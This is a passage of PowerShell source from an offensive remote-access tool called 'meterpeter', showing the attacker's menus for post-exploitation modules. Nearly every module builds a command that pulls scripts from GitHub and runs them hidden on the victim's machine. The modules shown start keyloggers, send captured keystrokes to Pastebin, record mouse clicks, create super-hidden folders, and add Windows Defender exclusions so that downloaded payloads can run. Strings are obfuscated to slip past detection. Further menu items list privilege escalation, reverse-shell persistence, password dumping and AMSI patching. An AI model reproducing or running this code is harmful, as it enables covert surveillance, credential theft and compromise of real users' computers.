\"cd `$Env:TMP;iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/Dump-Browser/SocialMedia.ps1`\" -OutFile `\"SocialMedia.ps1`\"|Unblock-File;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-file SocialMedia.ps1 -schedule '$ForceOrNot' -mode start`\"\"\r\n                }             \r\n             }\r\n          }\r\n          Else\r\n          {\r\n             write-host \"\"\r\n             If($SetMeUp -imatch '^(True)$')\r\n             {\r\n                ## Execute command [stop key`logger]\r\n                $Command = \"If(-not(Test-Path -Path `$Env:TMP\\met.pid)){echo `\"``n``n   > Error: Social media key`logger not found in `$Env:COMPUTERNAME!``n`\" `> `$Env:TMP\\repo.log;Get-Content -Path `$Env:TMP\\repo.log;Remove-Item -Path `$Env:TMP\\repo.log -Force}Else{powershell -file `$Env:TMP\\SocialMedia.ps1 -mode stop -sendtopastebin;`$KillFirstPID = (Get-Content -Path `$Env:TMP\\met.pid);Remove-Item -Path 
`$Env:TMP\\met.pid -Force;Stop-Process -Id `$KillFirstPID -Force;Remove-Item `$Env:TMP\\SocialMedia.ps1 -Force}\"\r\n             }\r\n             Else\r\n             {\r\n                ## Execute command [stop key`logger]\r\n                $Command = \"If(-not(Test-Path -Path `$Env:TMP\\met.pid)){echo `\"``n``n   > Error: Social media key`logger not found in `$Env:COMPUTERNAME!``n`\" `> `$Env:TMP\\repo.log;Get-Content -Path `$Env:TMP\\repo.log;Remove-Item -Path `$Env:TMP\\repo.log -Force}Else{powershell -file `$Env:TMP\\SocialMedia.ps1 -mode stop;`$KillFirstPID = (Get-Content -Path `$Env:TMP\\met.pid);Remove-Item -Path `$Env:TMP\\met.pid -Force;Stop-Process -Id `$KillFirstPID -Force;Remove-Item `$Env:TMP\\SocialMedia.ps1 -Force}\"\r\n             }\r\n          }\r\n       }\r\n       If($choise -ieq \"Mouse\")\r\n       {\r\n          ## Random FileName generation\r\n          $Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})\r\n          $CaptureFile = \"$Env:TMP\\MouseCapture-\" + \"$Rand.zip\" ## Capture File Name\r\n          Write-Host \" - Time of capture (seconds): \" -ForeGroundColor Red -NoNewline\r\n          [int]$Timmer = Read-Host\r\n          If([int]$Timmer -lt 10)\r\n          {\r\n             $Timmer = \"15\"\r\n             Write-Host \"   => Error: wrong input, set demo to '$Timmer'\" -ForegroundColor Red\r\n          }\r\n\r\n          #banner\r\n          Write-Host \"`n`n   Capture      Timer     Remote Storage\" -ForegroundColor Green\r\n          Write-Host \"   -------      ------    --------------\"\r\n          Write-Host \"   MouseClicks  $Timmer(sec)   %TMP%\\MouseCapture-${Rand}.zip`n\"\r\n\r\n          If(Test-Path \"$Env:WINDIR\\System32\\psr.exe\")\r\n          {\r\n             $Command = \"Start-Process -WindowStyle hidden powershell -ArgumentList `\"psr.exe`\", `\"/start`\", `\"/output `$Env:TMP\\MouseCapture-$Rand.zip`\", `\"/sc 1`\", `\"/maxsc 100`\", `\"/gui 0;`\", `\"Start-Sleep 
-Seconds $Timmer;`\", `\"psr.exe /stop`\" -EA SilentlyContinue|Out-Null\"\r\n          }\r\n          Else\r\n          {\r\n             Write-Host \"    => error: '$Env:WINDIR\\System32\\psr.exe' not found ..\" -ForegroundColor Red -BackgroundColor Black\r\n          }\r\n       }\r\n       If($choise -ieq \"Keystrokes\")\r\n       {\r\n          Write-Host \" - Start or Stop keyst`rokes key`logger? (start|stop): \" -ForegroundColor Red -NoNewline\r\n          $Exechoise = Read-Host\r\n          If($Exechoise -iMatch '^(stop)$')\r\n          {\r\n             ## Stop recording system keys`trokes\r\n             $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/keymanager.ps1`\" -OutFile `\"`$Env:TMP\\KeyManager.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\KeyManager.ps1`\" -Action 'Stop';Remove-Item -Path `\"`$Env:TMP\\KeyManager.ps1`\" -Force\"\r\n          }\r\n          Else\r\n          {\r\n             Write-Host \" - Use PS v2 to exec key`logger? 
(y|n): \" -ForeGroundColor Red -NoNewline\r\n             $UsePS2 = Read-Host\r\n             If($UsePS2 -iMatch '^(y|yes)$')\r\n             {\r\n                $UsePS2 = \"true\"\r\n             }\r\n             Else\r\n             {\r\n                $UsePS2 = \"false\"           \r\n             }\r\n\r\n             ## Capture remote host keyst`rokes\r\n             $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/keymanager.ps1`\" -OutFile `\"`$Env:TMP\\KeyManager.ps1`\"|Unblock-File;powershell -File `\"`$Env:TMP\\KeyManager.ps1`\" -Action 'Start' -UsePS2 $UsePS2;Remove-Item -Path `\"`$Env:TMP\\KeyManager.ps1`\" -Force\"\r\n          }\r\n       }\r\n       If($choise -ieq \"PasteBin\")\r\n       {\r\n          write-host \"`n`n   Description\" -ForegroundColor Yellow\r\n          write-host \"   -----------\"\r\n          write-host \"   This module takes the contents of keyl`ogger logfile (void.log)\"\r\n          write-host \"   and creates a new pastebin paste from it on the sellected account\"\r\n          write-host \"   each sellected time interval (120 sec) a max of 20 times (max pasts)\"\r\n          write-host \"   Recomended timeout: \" -NoNewline;\r\n          write-host \"3600 (one paste each hour)\" -ForegroundColor Yellow -NoNewline\r\n          write-host \" maxpastes: \" -NoNewline\r\n          write-host \"10 (max)\" -ForegroundColor Yellow\r\n\r\n          write-host \"`n`n   Modules   Description                  Remark\" -ForegroundColor green;\r\n          write-host \"   -------   -----------                  ------\";\r\n          write-host \"   Start     Send keys`trokes to pastebin  max of 20 pastes allowed by day\";\r\n          write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow;\r\n          write-host \"`n`n :meterpeter:keyl`ogger:PasteBin> \" -NoNewline -ForeGroundColor Green;\r\n          $PasteBinChoise = Read-Host;\r\n          
If($PasteBinChoise -ieq \"Start\")\r\n          {\r\n             $PasteSettings = \"True\"\r\n             Write-Host \" - Input PastebinUsername  : \" -ForeGroundColor Red -NoNewline\r\n             $PastebinUsername = Read-Host\r\n             If($PastebinUsername -eq $null)\r\n             {\r\n                $PasteSettings = \"False\"\r\n                $PastebinUsername = \"missing pastebin acc name\"\r\n                write-host \"   => error: missing -PastebinUsername parameter\" -ForegroundColor Red -BackgroundColor Black\r\n             }\r\n\r\n             Write-Host \" - Input PastebinPassword  : \" -ForeGroundColor Red -NoNewline\r\n             $PastebinPassword = Read-Host\r\n             If($PastebinPassword -eq $null)\r\n             {\r\n                $PasteSettings = \"False\"\r\n                write-host \"   => error: missing -PastebinPassword parameter\" -ForegroundColor Red -BackgroundColor Black\r\n             }\r\n\r\n             Write-Host \" - Max of pastes to create : \" -NoNewline\r\n             $MaxPastes = Read-Host\r\n             If(-not($MaxPastes) -or $MaxPastes -eq $null)\r\n             {\r\n                $MaxPastes = \"15\"\r\n                write-host \"   => Max value missing, defaulting to: $MaxPastes\" -ForegroundColor DarkYellow\r\n             }\r\n\r\n             Write-Host \" - Create past each xxx sec: \" -NoNewline\r\n             $TimeOut = Read-Host\r\n             If($MaxPastes -gt 1)\r\n             {\r\n                If($TimeOut -eq $null -or $TimeOut -lt 120)\r\n                {\r\n                   $TimeOut = \"120\"\r\n                   write-host \"   => TimeOut value very low, defaulting to: $TimeOut\" -ForegroundColor DarkYellow\r\n                }              \r\n             }\r\n             Else\r\n             {\r\n                If($TimeOut -eq $null)\r\n                {\r\n                   $TimeOut = \"120\"\r\n                   write-host \"   => TimeOut value missing, 
defaulting to: $TimeOut\" -ForegroundColor DarkYellow                 \r\n                }              \r\n             }\r\n\r\n             write-host \" * Send ke`ystrokes to pastebin\" -ForegroundColor Green\r\n             Write-Host \"`n\" #Module Banner\r\n             Write-Host \"   Pastebin Username    : $PastebinUsername\"\r\n             If($PastebinPassword -eq $null)\r\n             {\r\n                Write-Host \"   PasteBin password    : \" -NoNewline;\r\n                Write-Host \"missing parameter declaration.\" -ForegroundColor Red -BackgroundColor Black;\r\n             }\r\n             Else\r\n             {\r\n                Write-Host \"   PasteBin password    : \" -NoNewline;\r\n                Write-Host \"*********\" -ForegroundColor Green;           \r\n             }\r\n             Write-Host \"   Max Pastes To Create : $MaxPastes (max)\"\r\n             Write-Host \"   Create Paste TimeOut : each $TimeOut (seconds)\"\r\n             Write-Host \"   Keyl`ogger File Path  : `$Env:TMP\\void.log`n\"\r\n\r\n             If($PasteSettings -iMatch '^(True)$')\r\n             {\r\n                $Command = \"iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SendToPasteBin.ps1`\" -OutFile `\"`$Env:TMP\\SendToPasteBin.ps1`\"|Unblock-file;Start-Process -WindowStyle hidden powershell -ArgumentList `\"-File `$Env:TMP\\SendToPasteBin.ps1 -PastebinUsername $PastebinUsername -PastebinPassword $PastebinPassword -MaxPastes $MaxPastes -TimeOut $TimeOut -Egg true`\"\";\r\n             }\r\n             Else\r\n             {\r\n                $Command = $Null;\r\n             }\r\n          }\r\n          Else\r\n          {\r\n             $PasteBinChoise = $null;\r\n             $Command = $Null;\r\n          }\r\n       }\r\n       If($choise -ieq \"Return\" -or $choice -ieq \"return\" -or $choise -ieq \"cls\" -or $choise -ieq \"Modules\" -or $choise -ieq \"modules\" -or $choise -ieq \"clear\")\r\n       
{\r\n          $Command = $Null; \r\n       }\r\n    }\r\n\r\n    If($Command -ieq \"PostExploit\" -or $Command -ieq \"post\")\r\n    {\r\n      ## Post-Exploiation Modules (red-team)\r\n      write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n      write-host \"   Post expl`oitation manager\"\r\n      write-host \"`n`n   Modules     Description\" -ForegroundColor green;\r\n      write-host \"   -------     -----------\";\r\n      write-host \"   Stream      Stream remote host desktop live\";\r\n      write-host \"   Camera      Take snapshots with remote webcam\";\r\n      write-host \"   FindEop     Search for EOP possible entry points\";\r\n      write-host \"   Escalate    Escalate privs from UserLand to Admin\";\r\n      write-host \"   Persist     Persist reverse tcp shell on startup\";\r\n      write-host \"   TimeStamp   Change remote host files timestamp\";\r\n      write-host \"   Msstore     manage applications from msstore\"\r\n      write-host \"   Artifacts   Clean remote host activity tracks\";\r\n      write-host \"   HiddenDir   Super\\hidden directorys manager\";\r\n      write-host \"   hideUser    Remote hidden accounts manager\";\r\n      write-host \"   Passwords   Dump (vault|dpapi|files|WDigest)\";\r\n      write-host \"   BruteAcc    Brute-force user account password\";\r\n      write-host \"   PhishCred   Promp remote user for logon creds\";\r\n      write-host \"   AMS`Ipatch   Disable AMS1 within current process\";\r\n      write-host \"   Allprivs    Enable all current shell privileges\";\r\n      write-host \"   Exclusions  Manage Windows Defender exclusions\";\r\n      write-host \"   LockPC      Lock remote host WorkStation\";\r\n      write-host \"   Restart     Restart remote host WorkStation\";\r\n      write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n      write-host \"`n`n :meterpeter:Post> \" -NoNewline -ForeGroundColor Green;\r\n      $choise = Read-Host;\r\n      If($choise -ieq 
\"Msstore\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   winget command line tool enables users to list, discover, install\"\r\n         write-host \"   or uninstall programs in silent mode [windows 10\\11 OS versions]\"\r\n         write-host \"`n`n   Modules   Description                Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------   -----------                ------------------\";\r\n         write-host \"   List      installed packets [local]  UserLand\";\r\n         write-host \"   Discover  search for appl msstore    UserLand\";\r\n         write-host \"   install   application from msstore   UserLand\";\r\n         write-host \"   Uninstall application from [local]   UserLand\";\r\n         write-host \"   Return    Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:Msstore> \" -NoNewline -ForeGroundColor Green;\r\n         $win_choise = Read-Host;\r\n         If($win_choise -ieq \"List\")\r\n         {\r\n            Write-Host \" * Enumerating installed programs!\" -ForegroundColor Green;write-host \"\"\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'list' -AutoDelete 'on'\"\r\n         }\r\n         If($win_choise -ieq \"Discover\")\r\n         {\r\n            $Program = Read-Host \" - Program name to search \"\r\n            If(-not($Program) -or $Program -ieq $null)\r\n            {\r\n               $Program = \"games\"\r\n               Write-Host \"   => Error: wrong program, set demo to '$Program' ..\" -ForegroundColor Red\r\n            }            \r\n            \r\n            Write-Host \" * Search for '$Program' in msstore!\" -ForegroundColor Green;write-host \"\"\r\n            $Command = \"iwr -Uri 
`\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'discover' -program '$Program' -AutoDelete 'on'\"\r\n         }\r\n         If($win_choise -iMatch '^(install)$')\r\n         {\r\n            $Program = Read-Host \" - Program name \"\r\n            If(-not($Program) -or $Program -ieq $null)\r\n            {\r\n               Write-Host \"`n   > Error: program name required to run module!\" -ForegroundColor Red\r\n               $Command = $null\r\n            }\r\n            Else\r\n            {\r\n               $Id = Read-Host \" - Program ID   \"\r\n               If(-not($Id) -or $Id -ieq $null)\r\n               {\r\n                  Write-Host \"`n   > Error: program ID required to run module!\" -ForegroundColor Red\r\n                  $Command = $null\r\n               }\r\n               Else\r\n               {\r\n                  Write-Host \" * Install '$Program' from msstore!\" -ForegroundColor Green;write-host \"\"\r\n                  $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'install' -program '$Program' -Id '$Id' -AutoDelete 'on'\"\r\n               }\r\n            }\r\n         }\r\n         If($win_choise -iMatch '^(Uninstall)$')\r\n         {\r\n            $Program = Read-Host \" - Program name \"\r\n            If(-not($Program) -or $Program -ieq $null)\r\n            {\r\n               Write-Host \"`n   > Error: program name required to run module!\" -ForegroundColor Red\r\n               $Command = $null\r\n            }\r\n            Else\r\n            {\r\n               $Id = Read-Host \" - Program ID   \"\r\n               If(-not($Id) -or $Id -ieq $null)\r\n               {\r\n                  Write-Host \"`n   > 
Error: program ID required to run module!\" -ForegroundColor Red\r\n                  $Command = $null\r\n               }\r\n               Else\r\n               {\r\n                  Write-Host \" * UnInstall '$Program' from local PC!\" -ForegroundColor Green;write-host \"\"\r\n                  $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/Invoke-Winget.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-WinGet.ps1`\"|Out-Null;powershell -file Invoke-WinGet.ps1 -Action 'Uninstall' -program '$Program' -Id '$Id' -AutoDelete 'on'\"\r\n               }\r\n            }\r\n         }\r\n         If($win_choise -ieq \"Return\" -or $win_choise -ieq \"cls\" -or $win_choise -ieq \"modules\" -or $win_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $win_choise = $Null;\r\n         }\r\n      }\r\n      If($choise -ieq \"HiddenDir\" -or $choise -ieq \"Hidden\")\r\n      {\r\n         write-host \"`n`n   Description:\" -ForegroundColor Yellow\r\n         write-host \"   This cmdlet allow users to Query\\Create\\Delete super hidden folders.\"\r\n         write-host \"   Super hidden folders contains 'hidden, system' attributes set and does\"\r\n         write-host \"   not show-up in explorer (gui) even if 'show hidden files' its activated.\"\r\n         Write-Host \"   Remark: Leave the input fields blank to random search for directorys.\" -ForegroundColor Yellow\r\n         write-host \"`n`n   Modules  Description                  Privileges Required\" -ForegroundColor green;\r\n         write-host \"   -------  -----------                  ------------------\";\r\n         write-host \"   Search   for regular hidden folders   UserLand\";\r\n         write-host \"   Super    Search super hidden folders  UserLand\";\r\n         write-host \"   Create   Create\\Modify super hidden   UserLand\";\r\n         write-host \"   Delete   One super hidden folder      
UserLand\";\r\n         write-host \"   Return   Return to Server Main Menu\" -ForeGroundColor yellow\r\n         write-host \"`n`n :meterpeter:Post:Hidden> \" -NoNewline -ForeGroundColor Green;\r\n         $Vault_choise = Read-Host;\r\n         If($Vault_choise -ieq \"Search\")\r\n         {\r\n            $FolderName = Read-Host \" - Folder name to search \"\r\n            If(-not($FolderName) -or $FolderName -ieq $null)\r\n            {\r\n               $FolderName = \"false\"\r\n               Write-Host \"   => Error: wrong FolderName, set demo to 'false' ..\" -ForegroundColor Red\r\n            }\r\n\r\n            $Directory = Read-Host \" - The directory to scan \"\r\n            If(-not($Directory) -or $Directory -ieq $null)\r\n            {\r\n               $Directory = \"false\"\r\n               $Recursive = \"false\"\r\n               Write-Host \"   => Error: wrong Directory, set demo to 'CommonLocations' ..\" -ForegroundColor Red\r\n            }\r\n            Else\r\n            {\r\n               Write-Host \" - Recursive search (y|n):\" -ForeGroundColor Red -NoNewline\r\n               $Recursive = Read-Host\r\n               If($Recursive -iMatch '^(y|yes)$')\r\n               {\r\n                  $Recursive = \"True\"\r\n               }\r\n               Else\r\n               {\r\n                  $Recursive = \"false\"\r\n               }\r\n            }\r\n\r\n            Write-Host \" * Enumerating hidden folders!\" -ForegroundColor Green;write-host \"\"\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Query -Directory `\"$Directory`\" -FolderName `\"$FolderName`\" -Recursive `\"$Recursive`\" -Attributes `\"Hidden`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n         }\r\n         If($Vault_choise -ieq 
\"Super\")\r\n         {\r\n            $FolderName = Read-Host \" - Folder name to search \"\r\n            If(-not($FolderName) -or $FolderName -ieq $null)\r\n            {\r\n               $FolderName = \"false\"\r\n               Write-Host \"   => Error: wrong FolderName, set demo to 'false' ..\" -ForegroundColor Red\r\n            }\r\n\r\n            $Directory = Read-Host \" - The directory to scan \"\r\n            If(-not($Directory) -or $Directory -ieq $null)\r\n            {\r\n               $Directory = \"false\"\r\n               $Recursive = \"false\"\r\n               Write-Host \"   => Error: wrong DirectoryInput, set demo to 'CommonLocations' ..\" -ForegroundColor Red\r\n            }\r\n            Else\r\n            {\r\n               Write-Host \" - Recursive search (y|n):\" -ForeGroundColor Red -NoNewline\r\n               $Recursive = Read-Host\r\n               If($Recursive -iMatch '^(y|yes)$')\r\n               {\r\n                  $Recursive = \"True\"\r\n               }\r\n               Else\r\n               {\r\n                  $Recursive = \"false\"\r\n               }\r\n            }\r\n\r\n            Write-Host \" * Enumerating super hidden folders.`n\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Query -Directory `\"$Directory`\" -FolderName `\"$FolderName`\" -Recursive `\"$Recursive`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n         }\r\n         If($Vault_choise -ieq \"Create\")\r\n         {\r\n            Write-Host \" - Create Hidden or Visible dir:\" -ForeGroundColor Red -NoNewline\r\n            $Action = Read-Host\r\n            If(-not($Action) -or $Action -ieq $null)\r\n            {\r\n               $Action = \"hidden\"\r\n               write-host \"    => 
wrong input, default to '$Action'\" -ForegroundColor Red\r\n            }\r\n\r\n            $FolderName = Read-Host \" - Folder name to Create\\Modify\"\r\n            If(-not($FolderName) -or $FolderName -ieq $null)\r\n            {\r\n               $FolderName = \"vault\"\r\n               write-host \"    => wrong input, default to '$FolderName'\" -ForegroundColor Red\r\n            }\r\n\r\n            $Directory = Read-Host \" - The storage directory to use\"\r\n            If(-not($Directory) -or $Directory -ieq $null)\r\n            {\r\n               $Directory = \"`$Env:TMP\"\r\n               write-host \"    => wrong input, default to '$Directory'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" * Create\\Modify super hidden folders\" -ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action $Action -Directory `\"$Directory`\" -FolderName `\"$FolderName`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n         }\r\n         If($Vault_choise -ieq \"Delete\")\r\n         {\r\n            Write-Host \" - Folder name to delete:\" -ForeGroundColor Red -NoNewline\r\n            $FolderName = Read-Host\r\n            If(-not($FolderName) -or $FolderName -ieq $null)\r\n            {\r\n               $FolderName = \"vault\"\r\n               write-host \"    => wrong input, default to '$FolderName'\" -ForegroundColor Red\r\n            }\r\n\r\n            $Directory = Read-Host \" - The storage directory\"\r\n            If(-not($Directory) -or $Directory -ieq $null)\r\n            {\r\n               $Directory = \"`$Env:TMP\"\r\n               write-host \"    => wrong input, default to '$Directory'\" -ForegroundColor Red\r\n            }\r\n\r\n            Write-Host \" * Delete super hidden folders\" 
-ForegroundColor Green\r\n            $Command = \"iwr -Uri `\"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/SuperHidden.ps1`\" -OutFile `\"`$Env:TMP\\SuperHidden.ps1`\"|Out-Null;powershell -WindowStyle hidden -File `$Env:TMP\\SuperHidden.ps1 -Action Delete -Directory `\"$Directory`\" -FolderName `\"$FolderName`\";Remove-Item -Path `$Env:TMP\\SuperHidden.ps1 -Force\"\r\n         }\r\n         If($Vault_choise -ieq \"Return\" -or $Vault_choise -ieq \"cls\" -or $Vault_choise -ieq \"modules\" -or $Vault_choise -ieq \"clear\")\r\n         {\r\n            $choise = $Null;\r\n            $Command = $Null;\r\n            $Vault_choise = $Null;\r\n         }      \r\n      }\r\n      If($choise -ieq \"Exclusions\")\r\n      {\r\n        $Obione = \"Ex@clu@sionPa@th\" -replace '@',''\r\n        $Obitwo = \"@Ex@clus@io@nPr@oc@es@s\" -replace '@',''\r\n        $Obitre = \"Ex@cl@us@@ion@E@xt@en@@sion\" -replace '@',''\r\n        write-host \"`n`n   Description:\" -ForegroundColor Yellow;\r\n        write-host \"   Manage Windows Defender exclusions (query, create, delete).\"\r\n        write-host \"   Types: $Obitre, $Obitwo, $Obione, ExclusionIpAddress.\"\r\n        write-host \"   The files covered by the exclusion definition will be excluded from Defender\"\r\n        write-host \"   real-time protection, proactive monitoring, scheduled scans and on-demand scans.\"\r\n        write-host \"   Remark: the URI payload is downloaded to %TMP% and is not deleted after execution.\" -ForegroundColor Yellow\r\n        write-host \"`n`n   Modules     Description                      Privileges Required\" -ForegroundColor green;\r\n        write-host \"   -------     -----------                      -------------------\";\r\n        write-host \"   Query       Query all Defender exclusions    \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Create      Create a new Defender exclusion  \" -NoNewline\r\n        write-host 
\"Administrator\" -ForegroundColor Red;\r\n        write-host \"   UrlExec     Download\\Exec through exclusion  \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Delete      Delete one Defender exclusion    \" -NoNewline\r\n        write-host \"Administrator\" -ForegroundColor Red;\r\n        write-host \"   Return      Return to Server Main Menu\" -ForeGroundColor yellow;\r\n        write-host \"`n`n :meterpeter:Post:Exclusions> \" -NoNewline -ForeGroundColor Green;\r\n        $WD_choise = Read-Host;\r\n        If($WD_choise -ieq \"Query\")\r\n        {\r\n           #Execute command remote\r\n           write-host \" * Query for Defender exclusions.`n`n\" -ForegroundColor Green\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'query';Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($WD_choise -ieq \"Create\")\r\n        {\r\n           write-host \" - $Obitre, $Obitwo, $Obione, Exc`lusionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n           $ExcludeType = Read-Host;\r\n           If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n           {\r\n              $ExcludeType = \"$Obione\"\r\n           }\r\n           write-host \" - Exclude from Defender scans: \" -ForeGroundColor Red -NoNewline;\r\n           $ExcludePath = Read-Host;\r\n           If(-not($ExcludePath) -or $ExcludePath -eq $null)\r\n           {\r\n              $ExcludePath = \"`$Env:TMP\"\r\n     
      }\r\n\r\n           #Execute command remote\r\n           write-host \" * Create a new Defender exclusion.`n`n\" -ForegroundColor Green\r\n           $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'add' -Type `\"$ExcludeType`\" -Exclude `\"$ExcludePath`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n        }\r\n        If($WD_choise -ieq \"UrlExec\")\r\n        {\r\n           write-host \" - $Obitre, $Obitwo, $Obione, Exclu`sionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n           $ExcludeType = Read-Host;\r\n           If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n           {\r\n              $ExcludeType = \"$Obione\"\r\n           }\r\n           write-host \" - The URL to be downloaded: \" -NoNewline;\r\n           $UriLink = Read-Host;\r\n           If(-not($UriLink) -or $UriLink -eq $null)\r\n           {\r\n              Write-Host \"x Error: none URL sellected ..`n\" -ForegroundColor Red\r\n              $Command = $Null\r\n           }\r\n           Else\r\n           {\r\n              write-host \" - Arguments: \" -NoNewline;\r\n              $Arguments = Read-Host;\r\n              write-host \" * Create a new Defender exclusion.`n`n\" -ForegroundColor Green\r\n              If(-not($Arguments) -or $Arguments -eq $null)\r\n              {\r\n                 #Execute command remote\r\n                 $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match 
`\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'exec' -Type `\"$ExcludeType`\" -Exclude `\"`$Env:TMP`\" -Uri `\"$UriLink`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"   \r\n              }\r\n              Else\r\n              {\r\n                 #Execute command remote\r\n                 $Command = \"`$bool = (([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match `\"S-1-5-32-544`\");If(`$bool){iwr -uri `\"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/lib/WD-Bypass/Invoke-Exclusions.ps1`\" -OutFile `\"`$Env:TMP\\Invoke-Exclusions.ps1`\";powershell -file `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Action 'exec' -Type `\"$ExcludeType`\" -Exclude `\"`$Env:TMP`\" -Uri `\"$UriLink`\" -Arguments `\"$Arguments`\";Remove-Item -Path `\"`$Env:TMP\\Invoke-Exclusions.ps1`\" -Force}Else{echo `\"   `> Error: administrator privileges required.`\" `> `$Env:TMP\\fddds.log;Get-Content -Path `\"`$Env:TMP\\fddds.log`\";Remove-Item -Path `\"`$Env:TMP\\fddds.log`\" -Force}\"\r\n              }\r\n           }\r\n        }\r\n        If($WD_choise -ieq \"Delete\")\r\n        {\r\n           write-host \" - $Obitre, $Obitwo, $Obione, Exclu`sionIpAd`dress: \" -ForeGroundColor Red -NoNewline;\r\n           $ExcludeType = Read-Host;\r\n           If(-not($ExcludeType) -or $ExcludeType -eq $null)\r\n           {\r\n              $ExcludeType = \"$Obione\"\r\n           }\r\n           write-host \" - Exclusion entry to delete: \" -ForeGroundColor Red -NoNewline;\r\n           $ExcludePath = Read-Host;\r\n           If(-not($ExcludePath) -or 
